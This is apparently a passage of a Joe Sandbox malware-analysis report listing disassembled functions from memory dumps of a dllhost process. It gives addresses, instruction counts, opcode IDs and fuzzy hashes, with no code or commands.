                                                            • Instruction Fuzzy Hash: 4F312721B0EA4D0FDB96EB688C756B87BF1EF99200B0901FBD44DD7297CD18AD048392
                                                            Function 00007FFD9BA10A76 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 148e556c1279579187431cdbb3fe163fbc87e460c60868d198522f2286b85588
                                                            • Instruction ID: d2e0e6044895767e2de24369d3babcd093ed024df25c700ffcb84415e701b5f6
                                                            • Opcode Fuzzy Hash: 148e556c1279579187431cdbb3fe163fbc87e460c60868d198522f2286b85588
                                                            • Instruction Fuzzy Hash: 5E31A431A0D51E8FEBA0EBB4C4656EDBBF0FF18300F4555B6D409E31A2DA78A985CB50
                                                            Function 00007FFD9BA12488 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5658145a31d703a92c40a3d3661e879106a5f03e4edcd382e12967e817079b57
                                                            • Instruction ID: e3e4d7e984d0a108e70a9884730f4927110edaa31f26b3524dfad5f30d91c361
                                                            • Opcode Fuzzy Hash: 5658145a31d703a92c40a3d3661e879106a5f03e4edcd382e12967e817079b57
                                                            • Instruction Fuzzy Hash: EF212831F1880E4BEB94FBAC98656FD73E2EF98310F1501BBE41DD3285CD68A9414791
                                                            Function 00007FFD9BA109C1 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db2873602223e456c77e205e56374d729ed5f9eebd1e0a3c2351554661a2e761
                                                            • Instruction ID: 0012f9834b33b096f99c4b9b6bd08d97a28c76f568f1992f7a55b47bcb4d85ba
                                                            • Opcode Fuzzy Hash: db2873602223e456c77e205e56374d729ed5f9eebd1e0a3c2351554661a2e761
                                                            • Instruction Fuzzy Hash: CB11D512B0FE4F0FE7F8ABAC14756B636C1DFA5A10B0611BBD44DC21A7DD98AD064388
                                                            Function 00007FFD9BA1089D Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 102d4aa2090ef8ac85101b404b72be9c9988f2074fc48b6f95684c932de5dd58
                                                            • Instruction ID: 241c81cee2540b9ba852a952b97c3dabfa462dd009aeafbdc390b405c451f7c2
                                                            • Opcode Fuzzy Hash: 102d4aa2090ef8ac85101b404b72be9c9988f2074fc48b6f95684c932de5dd58
                                                            • Instruction Fuzzy Hash: 8E11563160DB8D0FD7D5EB2884B01A97BE0EFA4360F01457FE04DC72A2DD69AA428341
                                                            Function 00007FFD9BA109E0 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f823bfc0bb3ec380752857928e3c33cdee2f726e1a2cbdf1c2946d63794d91b6
                                                            • Instruction ID: f891a833d66b930dc2358aaf14f8095ceae62e0273f8a818135fadbedb0c1470
                                                            • Opcode Fuzzy Hash: f823bfc0bb3ec380752857928e3c33cdee2f726e1a2cbdf1c2946d63794d91b6
                                                            • Instruction Fuzzy Hash: EC01FC12B0FD0F0BE2F87BAC14756B635C5DFE4A50B46117AE80DC219ADC99AD4643C4
                                                            Function 00007FFD9BA10E39 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04b1672ca071e08737edaa50ce620e9e1556db24b7ef8a383f11a21156335c37
                                                            • Instruction ID: 79fc4a5004af6d5b9318b4a6b7d2ca6df58e39f978dedb1d28b2c3a483696e7d
                                                            • Opcode Fuzzy Hash: 04b1672ca071e08737edaa50ce620e9e1556db24b7ef8a383f11a21156335c37
                                                            • Instruction Fuzzy Hash: 4F01C820B0E6C94FD397E37898A96B47F91EF87215B1941F6E09CCB0B7D9984946C342
                                                            Function 00007FFD9BA14064 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3eb35d45dc71aa6db29aafb5f59e168d0fa9da0cc040fb2fbc2b3cd76f1f862
                                                            • Instruction ID: d9e53e45fe46dc8db714a32b93b0bd428008ff60a2518aceda77fea14fdc8658
                                                            • Opcode Fuzzy Hash: f3eb35d45dc71aa6db29aafb5f59e168d0fa9da0cc040fb2fbc2b3cd76f1f862
                                                            • Instruction Fuzzy Hash: F2F02852F0A80E0FEBE4A76D14AA2FC77D5EF99211B61207ED05DC31B6DC1C2D064741
                                                            Function 00007FFD9BA14F11 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56fa87f22fcab0cca73c23ac33b4f9eff753c63cd72678b95518bd85015f1a09
                                                            • Instruction ID: 6607576d918896d5092e1db8f67a29406f500df791ff91ad3972f4e5d4175275
                                                            • Opcode Fuzzy Hash: 56fa87f22fcab0cca73c23ac33b4f9eff753c63cd72678b95518bd85015f1a09
                                                            • Instruction Fuzzy Hash: 6E014920B0E18B0AE76923B895303F827619F82314F0612FAD46DCE2F7CD9D59968391
                                                            Function 00007FFD9BA1518D Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79c175fcf288bfd0d7fcd0a6c2039270dee497cc9c61db4b7ddb93f9e73bc397
                                                            • Instruction ID: 5eab8878cb8091d0666f7875f4f095d1357205ab12cf98bbc0469ee151440404
                                                            • Opcode Fuzzy Hash: 79c175fcf288bfd0d7fcd0a6c2039270dee497cc9c61db4b7ddb93f9e73bc397
                                                            • Instruction Fuzzy Hash: 9BF0A431F0540E4BEBA5FB9C98651FD73F2EF98310B150476D40DE3295CD24AA018790
                                                            Function 00007FFD9BA10DF6 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ef8d19415664ce47f1319bdecdd5d3aa2b7749dff9aecda4eed2fcc96a7f196
                                                            • Instruction ID: 1a78da3608e6a1b8672c0a641c99c13c1bcee998ce5f0721847a415220c63707
                                                            • Opcode Fuzzy Hash: 0ef8d19415664ce47f1319bdecdd5d3aa2b7749dff9aecda4eed2fcc96a7f196
                                                            • Instruction Fuzzy Hash: 64E02B7290E64C1EEB18EA59FC17CF67B98DA87334B00005FF19DC11A3E1526563C255
                                                            Function 00007FFD9BA13C81 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a5dd2829e265f50067a5f370bf2db4ceef2b61d8de5c7a20ff8d521ef641ce8
                                                            • Instruction ID: 7cc0c0f14b54ad196b9bd3a360db198ef177e542a34bf181802a8e520d70b2f9
                                                            • Opcode Fuzzy Hash: 4a5dd2829e265f50067a5f370bf2db4ceef2b61d8de5c7a20ff8d521ef641ce8
                                                            • Instruction Fuzzy Hash: 20E0DF3195EA0C6BDB64AB59FC2068876E5FB89308F0502AAE44CC3191E7665759C301
                                                            Function 00007FFD9BA14D65 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aaac65e1032ec3f59c3196eb30d8c131958bbb04a976f279d208e87da49db2e0
                                                            • Instruction ID: 4921098f0ff696c78bf11410c33e407b697ba5e2c5aa7559949572cc717dc99e
                                                            • Opcode Fuzzy Hash: aaac65e1032ec3f59c3196eb30d8c131958bbb04a976f279d208e87da49db2e0
                                                            • Instruction Fuzzy Hash: 1AE0C03280EA0D8BDF84EB9C9C202D833A4FF4A308F01006EE00CC31A0D7725A40C740
                                                            Function 00007FFD9BA14EF0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf3d480c299b9bee9b55e6a48c906c0b63557bb7ffcc04edb7bf5fbb930cc0ce
                                                            • Instruction ID: 8159366f6595b49315e400ee218f8dceccb37a608c89677f5dbda219197b9dde
                                                            • Opcode Fuzzy Hash: cf3d480c299b9bee9b55e6a48c906c0b63557bb7ffcc04edb7bf5fbb930cc0ce
                                                            • Instruction Fuzzy Hash: D6D0C94194F3C94FCB0392B91C390807F706E0781074E51EBC4C4CB1E3D88D19898322
                                                            Function 00007FFD9BA10CC0 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.1899741164.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd9ba10000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 211ad34f419124e87f3f3b41d05f79f2e9167f465a03133c707cb332b5a3c418
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: 211ad34f419124e87f3f3b41d05f79f2e9167f465a03133c707cb332b5a3c418
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340

                                                            Executed Functions

                                                            Function 00007FFD9B9F1222 Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17d5f0fade0d4bc68226c221d6e28c99bc4a2c90a5f79567f5ff7deeb530f8c9
                                                            • Instruction ID: 560f365614ad1238504d91450ee0ddd09411ce51eac9afdeb7783ead378f9915
                                                            • Opcode Fuzzy Hash: 17d5f0fade0d4bc68226c221d6e28c99bc4a2c90a5f79567f5ff7deeb530f8c9
                                                            • Instruction Fuzzy Hash: 47C18D20B2E69A0FE7699B7884652B53FD1EF96324F0640BED48AC71E7DD1D6C428381
                                                            Function 00007FFD9B9F0EB5 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H
                                                            • API String ID: 0-2852464175
                                                            • Opcode ID: 2a0d7612bfeb2656f0ba7c06217dc5542986dadb7450e15280f23e31c605518d
                                                            • Instruction ID: 9cfd7178e5d30d73b9365b6673119bd2a3b146e48ea9c48b1e25eb53e5e7c64c
                                                            • Opcode Fuzzy Hash: 2a0d7612bfeb2656f0ba7c06217dc5542986dadb7450e15280f23e31c605518d
                                                            • Instruction Fuzzy Hash: A581E631B1995D5FDB98EB6884657F8BBE2EF98720F55417AE04ED32D2CE246C028780
                                                            Function 00007FFD9B9F276D Relevance: .7, Instructions: 679COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 68df68c6d975f1dfb95055f41c5027be0e7dad0204b7ebcc5cb8fce37f5ced42
                                                            • Instruction ID: aa1c6a1cf0346d21810fd349fc17a9128aa1fc0af3320be6184c9d11ef69bd95
                                                            • Opcode Fuzzy Hash: 68df68c6d975f1dfb95055f41c5027be0e7dad0204b7ebcc5cb8fce37f5ced42
                                                            • Instruction Fuzzy Hash: 8C322531B2D64E5FE375ABA488617B43BD0EF81320F4600B9E84D871E7DE1DAD4A8751
                                                            Function 00007FFD9B9F34AF Relevance: .5, Instructions: 483COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6a0192abcc8abdb47a0cb458ed0f78d8e029600182da6c5d838b9fbf2a8e8cd
                                                            • Instruction ID: 6f3b3bfe03125f12f7db109afa5a9cb458298f3f606b0d966994c2a70c127d85
                                                            • Opcode Fuzzy Hash: f6a0192abcc8abdb47a0cb458ed0f78d8e029600182da6c5d838b9fbf2a8e8cd
                                                            • Instruction Fuzzy Hash: 53E11622B1891A5EEB14BBBCE8A5AEC7BA0FFC4325F10047BD14DC7197DE296C498750
                                                            Function 00007FFD9B9F48F1 Relevance: .5, Instructions: 462COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9883acb7e4950987231227c316497dda9ac1e151e532a3e6b48a095969ef3e60
                                                            • Instruction ID: b5131988886d398f0bd888743128a1adf0cf406e4350fe02fb50239ef1b583b6
                                                            • Opcode Fuzzy Hash: 9883acb7e4950987231227c316497dda9ac1e151e532a3e6b48a095969ef3e60
                                                            • Instruction Fuzzy Hash: 6EE1D561F3A90E6EE7B8DB9984A57B93BE1FF94710B92407DD01DC33A2DD286D418380
                                                            Function 00007FFD9B9F34D3 Relevance: .5, Instructions: 461COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17a941a44efbdc71536ef400f5915568234b2269cd967a0891c762919fa61700
                                                            • Instruction ID: f0b81c07af8a35b94273f2f51d3d1c9083b91ed8bced6059766d13cbe79d3bdf
                                                            • Opcode Fuzzy Hash: 17a941a44efbdc71536ef400f5915568234b2269cd967a0891c762919fa61700
                                                            • Instruction Fuzzy Hash: EED10626B1891A5EEB14BBACE865AEC7BA0FFC4321F00017BD14DC7197DE296C898750
                                                            Function 00007FFD9B9F35D3 Relevance: .4, Instructions: 350COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1868930f2e6fcb4ef88877b76aa0721d39b51ca74e7cbe0522e0a784477e4ca2
                                                            • Instruction ID: da4d55cf103a4db90aa481693b0eb05491fbfdb545efc94f2b66d56baf32720d
                                                            • Opcode Fuzzy Hash: 1868930f2e6fcb4ef88877b76aa0721d39b51ca74e7cbe0522e0a784477e4ca2
                                                            • Instruction Fuzzy Hash: 7BB1E326B1991D5EEB54FBA8E865BED7BA0FF84321F00007BE10DD7296CE286C498751
                                                            Function 00007FFD9B9F2640 Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45a90f6b290e7d1b4b3e1d3bf93857d85f74070d8e696f265ce07a3892ddac77
                                                            • Instruction ID: 7e2676af64fa1696235313ce447a23d00cf08dd4ad5f02eaebbd732a557eab5c
                                                            • Opcode Fuzzy Hash: 45a90f6b290e7d1b4b3e1d3bf93857d85f74070d8e696f265ce07a3892ddac77
                                                            • Instruction Fuzzy Hash: 58B12931B1DA4E5FE768EBA888646B67BD1EF45324F5100B9E00EC71D7CE29AC46C750
                                                            Function 00007FFD9B9F39E9 Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73ee5f602a7a9c3665f56c407068defbee26fd6bca519afb181b183323394234
                                                            • Instruction ID: d40721f74a5da73e6ebcfb993c3f775b86d16e4cb96f92d68f106aa3118d17cf
                                                            • Opcode Fuzzy Hash: 73ee5f602a7a9c3665f56c407068defbee26fd6bca519afb181b183323394234
                                                            • Instruction Fuzzy Hash: D7812D70E18A1D8FDB54EFA8C8A5AAD7BB1FF58314F5000B9D00DE7295DE38A941CB40
                                                            Function 00007FFD9B9F3C81 Relevance: .2, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a2e66868f9ff4a3976221e43cb2c291b24d012d535a7a870a81f5936318f8710
                                                            • Instruction ID: 10c8cde5fefaa828e41466e7bca74a8962e2c1fbd1d36f27c08271ae9b88eced
                                                            • Opcode Fuzzy Hash: a2e66868f9ff4a3976221e43cb2c291b24d012d535a7a870a81f5936318f8710
                                                            • Instruction Fuzzy Hash: C8511770E18A1D9FDFA4EF58C894BA9B7F1FB58314F5001AAD40DE3295DB34AA84CB41
                                                            Function 00007FFD9B9F50A9 Relevance: .2, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0aedabc0ce25adc237ae3df6979bccf2e537e1d956b6e2cc2f36be9b76130a5e
                                                            • Instruction ID: d1cfd5164979f843f7ac3d0380717aca59383a0525c444ef6d002c19bfaa2a33
                                                            • Opcode Fuzzy Hash: 0aedabc0ce25adc237ae3df6979bccf2e537e1d956b6e2cc2f36be9b76130a5e
                                                            • Instruction Fuzzy Hash: C2414621B1E68E1FD712AB6858355F97FB0EF46320B1A01FBD458CB1E3C91DAD058392
                                                            Function 00007FFD9B9F2488 Relevance: .1, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0782b54fcd0c2103be8b3b1901a55f3ed409716595cc36727c233968b7e7c46
                                                            • Instruction ID: dab8b7a11d808d61535e2ca71e6701b91ee09ca23bc248103782d61e1886f111
                                                            • Opcode Fuzzy Hash: c0782b54fcd0c2103be8b3b1901a55f3ed409716595cc36727c233968b7e7c46
                                                            • Instruction Fuzzy Hash: 67419731B1D64E1FD724EBA898255F97FF0EF85320B1601BBD419C7192CD29AE028392
                                                            Function 00007FFD9B9F0B85 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3e33e71209db440da8afab5b20669a7be3518e112c62a1ece2c6dafd75b00dd
                                                            • Instruction ID: 61bc80bdfe89860d48e5d2f827365c7f0da45b73478d43107900cfdb989b0146
                                                            • Opcode Fuzzy Hash: e3e33e71209db440da8afab5b20669a7be3518e112c62a1ece2c6dafd75b00dd
                                                            • Instruction Fuzzy Hash: CF4127217199491FDB94FF7884A5AB577E6EF98310B0641B6E40EC32E7CD29AD468301
                                                            Function 00007FFD9B9F0CDA Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2aa6d5faf0ef149dff1ac97efc94d547d4854150fc01a0341b0aa4935efda8b1
                                                            • Instruction ID: 4e27509396ff9f722713efee57dd1ca4530fc6f6cea68544c10c349167bc4610
                                                            • Opcode Fuzzy Hash: 2aa6d5faf0ef149dff1ac97efc94d547d4854150fc01a0341b0aa4935efda8b1
                                                            • Instruction Fuzzy Hash: 1A310B21B1DB440FE758AB6C98167B97BD1EF99714F0001BEF44EC31C7CD286C068296
                                                            Function 00007FFD9B9F0A76 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b1bb139b81ffe3e452e46aa68b7a67eb0dddbe4527799f5caeb98d917bb222c
                                                            • Instruction ID: 19ac2b1f63ef509b58f445c6d6a0966d7dfb495409b61e85b922d8f37312e71f
                                                            • Opcode Fuzzy Hash: 0b1bb139b81ffe3e452e46aa68b7a67eb0dddbe4527799f5caeb98d917bb222c
                                                            • Instruction Fuzzy Hash: 27317E31A2991D8EEB54EFB4C4696E9BBF0FF18311F0505B6D409E31A2DA38AD84CB50
                                                            Function 00007FFD9B9F09C1 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7403e0098efa10b4b1116b178c0489a109f3b51fa8a110c5b2cb2ab0cb3d0a97
                                                            • Instruction ID: 558721482a8aff08a372fa697ba2437879e6e58cbdb6647fe248378d6625ffc0
                                                            • Opcode Fuzzy Hash: 7403e0098efa10b4b1116b178c0489a109f3b51fa8a110c5b2cb2ab0cb3d0a97
                                                            • Instruction Fuzzy Hash: 9011C312F1ED4F2EE7A4AFAC14796B52B89DF95A20B0741BAD40DC21A7DD08ED468380
                                                            Function 00007FFD9B9F089D Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
